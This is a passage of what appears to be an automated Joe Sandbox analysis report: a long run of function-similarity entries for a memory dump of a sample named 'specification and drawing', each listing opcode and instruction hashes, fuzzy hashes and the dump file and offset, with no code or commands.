                                                                                                          • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                          • Instruction ID: 0acfc53c912cf14002daf3734cd8d0227d91f9d6413e993497ac8d213598d12c
                                                                                                          • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                          • Instruction Fuzzy Hash: 85E0D8327006012BE726AE598CC4F47776EDFD6B14F040079B9045F292CAE2DC0982A4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                          • Instruction ID: 7e13863c1fb5a9bb1f7f7b2ed3e69d90327c4805dbb6055050ec1a3941993d74
                                                                                                          • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                          • Instruction Fuzzy Hash: 75F06572104204DFE3699F09DD44F52B7F8EB05365F96C025EA199B561D379EC40CBE4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                          • Instruction ID: 71c38bb5e2c70cad8ba72231e833f752fa5950e5fabe420773ca333050730ff8
                                                                                                          • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                          • Instruction Fuzzy Hash: B9F0A039605341DBDB1ADF19D040AE97BA4FB41750B040058FC828B311D731E981DF55
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                          • Instruction ID: 0ad6f01f5fabb5719ca8e5d9930f512ed81b2ed22c03920639902e83956d6eaa
                                                                                                          • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                          • Instruction Fuzzy Hash: F1E0D832244645ABD3212A5D8802B6B7BE5DBD47A0F15042DEB80CB950DB74DC44C7D8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                          • Instruction ID: 8330ba5906736a318c4f11fe2eb193b2ab123727316e8ec86173ecaa95ca33ce
                                                                                                          • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                          • Instruction Fuzzy Hash: E9E0DF32A00610BFDB25A7998D01FDBBEBCDB94FA0F050054BA00E71D4E630DE00D690
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 2dced52e8800c02eadabe4105438a187c7554f9c0e795f1d635717dbd1874542
                                                                                                          • Instruction ID: 680a4650c292ef5062814784e9150072f8fdc3bcf498c1505d1f29020ff502f6
                                                                                                          • Opcode Fuzzy Hash: 2dced52e8800c02eadabe4105438a187c7554f9c0e795f1d635717dbd1874542
                                                                                                          • Instruction Fuzzy Hash: BCE09272100A549BC326BB29DD15FCA779AEB64764F014529F15597190CB34A850CB94
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                          • Instruction ID: cc240cf008e8aeb5311967299ba64434c93e19a9d5317ca721512763f7c5cb7f
                                                                                                          • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                          • Instruction Fuzzy Hash: 55E0C2343003058FE719CF19C040BA27BB6BFD5A10F28C068A9488F605EB33E852CB40
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e75b30a34fe38bc75c0a7d4cdbcf6e1b4a6af6ae3b3d949bc1473692039ac47c
                                                                                                          • Instruction ID: 3273ca11d2d568a64efdd7fbcd6cbbb7e1f96188ef6d82fe41c453b2df6fd0da
                                                                                                          • Opcode Fuzzy Hash: e75b30a34fe38bc75c0a7d4cdbcf6e1b4a6af6ae3b3d949bc1473692039ac47c
                                                                                                          • Instruction Fuzzy Hash: FED02B325810346EDB7AF11ABD06FD33AD99B44324F094CB4F74892414D554DC8592C4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                          • Instruction ID: 58f57d7aa300358c05ab6c892b71707eec8769a64e2b0eac52415d1aa99bc76f
                                                                                                          • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                          • Instruction Fuzzy Hash: 1EE0C231404E25EFDB363F16DC44F9576A9FF58B10F14882AE1C10A0B4C7B4AC81CB44
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 42f8a369b812e59827bcfcd9d5e1c41a899fecd46d29bf29f16ad2ddbdd41aec
                                                                                                          • Instruction ID: 2951800ecd747d0ccfc2c4f400d9cfc64155826e34570222680cfc33e030aa3b
                                                                                                          • Opcode Fuzzy Hash: 42f8a369b812e59827bcfcd9d5e1c41a899fecd46d29bf29f16ad2ddbdd41aec
                                                                                                          • Instruction Fuzzy Hash: 36E08C32100564ABC211FB5DDD50F8A739AEBA4660F000125F1918B690CA20AC40CB94
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                          • Instruction ID: c174f30d911eb8ccf7d94b892b613ffd27a186445535cb34fca37e9e1a2b0c50
                                                                                                          • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                          • Instruction Fuzzy Hash: 7CE08633111A1487D728DE18D512BB677E4EF45720F09863EA65347780C534E548C794
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                          • Instruction ID: 577dea735589853ff36bf6e45b93f67328906d29a60356893eb8c9abe3482633
                                                                                                          • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                          • Instruction Fuzzy Hash: 96D05E36511A50AFC3329F1BEA00C53FBF9FBC4A10705063EA54583924C771A806CBA0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                          • Instruction ID: 970dd3b3c8e17fb52561004913e76f8ec2b0dc8a3445bc41578d87bd48ae0a24
                                                                                                          • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                          • Instruction Fuzzy Hash: 16D0A932204A28ABD732AA1CFC00FC333E8BB88720F060459B008CB050C3A0AC81CA84
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                          • Instruction ID: 99ad4a9cae9d4a16737c9a51ca7ed2992dede0f20f40cccc6bf74d4b35edbc6b
                                                                                                          • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                          • Instruction Fuzzy Hash: 99E0EC759517889BDF16DF59C640F9EBBB9BB94B40F151058A1485F664C724A900CB40
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                          • Instruction ID: ba496ee634c882761525fbe9166fb621853a937c417ec66ffdf887267be2b772
                                                                                                          • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                          • Instruction Fuzzy Hash: 54D02232322070D7CB3857556840FE76905EB80A90F0A006D340A93800C0058C82C2E0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                          • Instruction ID: 460564d6b5842fadf77d8cceb97f206a8717b7275f720674891e70bddd896060
                                                                                                          • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                          • Instruction Fuzzy Hash: 65D012771D064DBBCB119F66DC01F957BA9E764BA0F445020B5048B5A0C63AE950D684
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f11686ad8715f30a5e894bcdadde83369d59e47a40fb277f7c6fa2088b1ea4d1
                                                                                                          • Instruction ID: ccb97b03ad99cd3d6eefb2abd4ad410b99286f2f9c87e9413597452a6d7ac296
                                                                                                          • Opcode Fuzzy Hash: f11686ad8715f30a5e894bcdadde83369d59e47a40fb277f7c6fa2088b1ea4d1
                                                                                                          • Instruction Fuzzy Hash: 6ED0A730A01249CBEF1ECF08C612E6E36B0FB50640B40007CF74051821D325EC01C700
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                          • Instruction ID: 86681701bcd605a77b2211518c4e26e24b2716146c1f228a5ed19d26b17d9425
                                                                                                          • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                          • Instruction Fuzzy Hash: 9EC01232290648AFC712AB99CD01F427BA9EBA8B40F000021F2048B670C631E820EA84
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                          • Instruction ID: bff56f7bca8b667f83ac3c5607c5b5f703418733df1e7d047e24966c02f4e3fe
                                                                                                          • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                          • Instruction Fuzzy Hash: 89D01236200248EFCB01DF51C890D9A776AFBD8710F108019FD19076118A75ED62DA50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                          • Instruction ID: a11dfc0a2422f5e358c61ebe76d35e60960afd63835eed4e6c5757aba4b4de2c
                                                                                                          • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                          • Instruction Fuzzy Hash: C6C04C797016428FCF16DB5DD694F4577E4F744740F150890E845CB721E724E801CA11
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                                                                          • Instruction ID: 4a8e756debd19aec5e2cec7661c933f06e68ba7a04c1400247d3915b6bcc3fa9
                                                                                                          • Opcode Fuzzy Hash: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                                                                          • Instruction Fuzzy Hash: 65B01232212545DFC7026721CB04B5832EDBF017C0F0900F465408D830D6188910E501
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 336711d991a7d5b804dc5397dbcb25f8067e8f516a1f2ac9b84d5ace1bf08c5b
                                                                                                          • Instruction ID: 6ec35449439df6366f94fec8566b0ee965970dc0b6282e12473d8c69a02d0df5
                                                                                                          • Opcode Fuzzy Hash: 336711d991a7d5b804dc5397dbcb25f8067e8f516a1f2ac9b84d5ace1bf08c5b
                                                                                                          • Instruction Fuzzy Hash: 0E900232645800139144715859845469005A7E1301B55C021E0425554CCB148A565361
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 94c46c9aa6db852f567e6040c08504f5736a730b9eef307f468f32d28184449a
                                                                                                          • Instruction ID: 82ccc2b3fa0c1030cfe64393dba005efcba6c4be80408e0bc750da9cd9f3b995
                                                                                                          • Opcode Fuzzy Hash: 94c46c9aa6db852f567e6040c08504f5736a730b9eef307f468f32d28184449a
                                                                                                          • Instruction Fuzzy Hash: 3F90026264150043414471585904406B005A7E2301395C125A0555560CC71889559369
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 2661a12015ab8e791fa8ab491730d49148a19d7b7b0c3a2ce83b8e22292defae
                                                                                                          • Instruction ID: ff12f416a7574b72802b2f7718b4ce3e5a0856b1c7c290d9faea54c10fbf0769
                                                                                                          • Opcode Fuzzy Hash: 2661a12015ab8e791fa8ab491730d49148a19d7b7b0c3a2ce83b8e22292defae
                                                                                                          • Instruction Fuzzy Hash: 9390023224140803D10871585904686500597D1301F55C021A6025655ED76589917231
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 568af7d27fb556a5a731716940bec982d98acbaedc2f1392601c4a6edefd1f7b
                                                                                                          • Instruction ID: 550810e239b6f4b896545221ce01addd27b3723161648bd3776f7040be106d7b
                                                                                                          • Opcode Fuzzy Hash: 568af7d27fb556a5a731716940bec982d98acbaedc2f1392601c4a6edefd1f7b
                                                                                                          • Instruction Fuzzy Hash: 7D90043374540C03D154715C55147475005D7D1301F55C031F0035754DC755CF5577F1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 1623aa7e25c4266ea722206d5babad02515c3f86758c16eb13be7d051b3a3ee7
                                                                                                          • Instruction ID: a97d590cc2441fe97374a348ef225c0c7b530a9c885c9f327d0efe79fc82d833
                                                                                                          • Opcode Fuzzy Hash: 1623aa7e25c4266ea722206d5babad02515c3f86758c16eb13be7d051b3a3ee7
                                                                                                          • Instruction Fuzzy Hash: 1090023224140803D1847158550464A500597D2301F95C025A0026654DCB158B5977A1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 1b2f64c39ece18165fa99610b6d1ed4522c736752b10eedcdb90fa9037a29eae
                                                                                                          • Instruction ID: 97877d6c91219591bd12e7d1dd2b4eac425d77bcdf2bdc6e0c3c4c335419a7e2
                                                                                                          • Opcode Fuzzy Hash: 1b2f64c39ece18165fa99610b6d1ed4522c736752b10eedcdb90fa9037a29eae
                                                                                                          • Instruction Fuzzy Hash: F590023224544843D14471585504A46501597D1305F55C021A0065694DD7258E55B761
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: fc860519aa00df43a2a73c607d944888fcc2f84d36e6c6ce6bf7f6fcb9593392
                                                                                                          • Instruction ID: c9c530cb973e42d95beb1f9e224c5bf2cd66ff089d1ff0983ff058172db95bbe
                                                                                                          • Opcode Fuzzy Hash: fc860519aa00df43a2a73c607d944888fcc2f84d36e6c6ce6bf7f6fcb9593392
                                                                                                          • Instruction Fuzzy Hash: 799002A2241540934504B2589504B0A950597E1201B55C026E1055560CC72589519235
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4902618203c84a710a8302ec44253152e3bbfbddbe42948af5055c18d0b3a7cc
                                                                                                          • Instruction ID: bb80ee6a644a4d13a241bcf70687e77adda06130dc58ec189013a52a0ca52534
                                                                                                          • Opcode Fuzzy Hash: 4902618203c84a710a8302ec44253152e3bbfbddbe42948af5055c18d0b3a7cc
                                                                                                          • Instruction Fuzzy Hash: FA90043735140003010DF55C17045075047D7D7351355C031F1017550CD731CD715331
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 2f1d5078d01bd52d9d0181bd0efcc163ba2b31800a71a432d461cc0e37b7ff04
                                                                                                          • Instruction ID: dc4be5a693b4d38fe544e53a4140bcc043192ba89b111bd58d33c8bb7d61e163
                                                                                                          • Opcode Fuzzy Hash: 2f1d5078d01bd52d9d0181bd0efcc163ba2b31800a71a432d461cc0e37b7ff04
                                                                                                          • Instruction Fuzzy Hash: 33900226261400030149B558170450B5445A7D7351395C025F1417590CC72189655321
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: ef9038fa33cb8374523abc3e5b788f83910b3f494c4b44705fac9a0ef2255aa6
                                                                                                          • Instruction ID: 47ec783c13350d00c6fecb8df1eda0765404297098ef74f093caedf616d7b3c8
                                                                                                          • Opcode Fuzzy Hash: ef9038fa33cb8374523abc3e5b788f83910b3f494c4b44705fac9a0ef2255aa6
                                                                                                          • Instruction Fuzzy Hash: 7390022A25340003D1847158650860A500597D2202F95D425A0016558CCB1589695321
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9679a6bc2eb015a7cc0f030e7cd8a0885b52ee20e17825562b0800319facff9d
                                                                                                          • Instruction ID: 5f2916861beb95296237e69b3f49abf2fdbefe9067a16957191b3f721cebb7a5
                                                                                                          • Opcode Fuzzy Hash: 9679a6bc2eb015a7cc0f030e7cd8a0885b52ee20e17825562b0800319facff9d
                                                                                                          • Instruction Fuzzy Hash: EA90022224544443D10475586508A06500597D1205F55D021A1065595DC7358951A231
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 36c7e015217356c5cfe5b64f3738de4e8acae833bc7ffce00d284161325ef9a2
                                                                                                          • Instruction ID: 4d7fbd2b61014b47c020f5326d3fb0c5a9d228e24a8ab57affeee595efea0222
                                                                                                          • Opcode Fuzzy Hash: 36c7e015217356c5cfe5b64f3738de4e8acae833bc7ffce00d284161325ef9a2
                                                                                                          • Instruction Fuzzy Hash: 8D90022234140003D144715865186069005E7E2301F55D021E0415554CDB1589565322
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e15ab511638d6faeeb164fbc3d1788ac82d6f20eb0e222b98b802bf06d11c3a3
                                                                                                          • Instruction ID: 787a4aed12bf7886bc9b8e06d57cbdc5523ab0a3adac16be8efa15ad27a44121
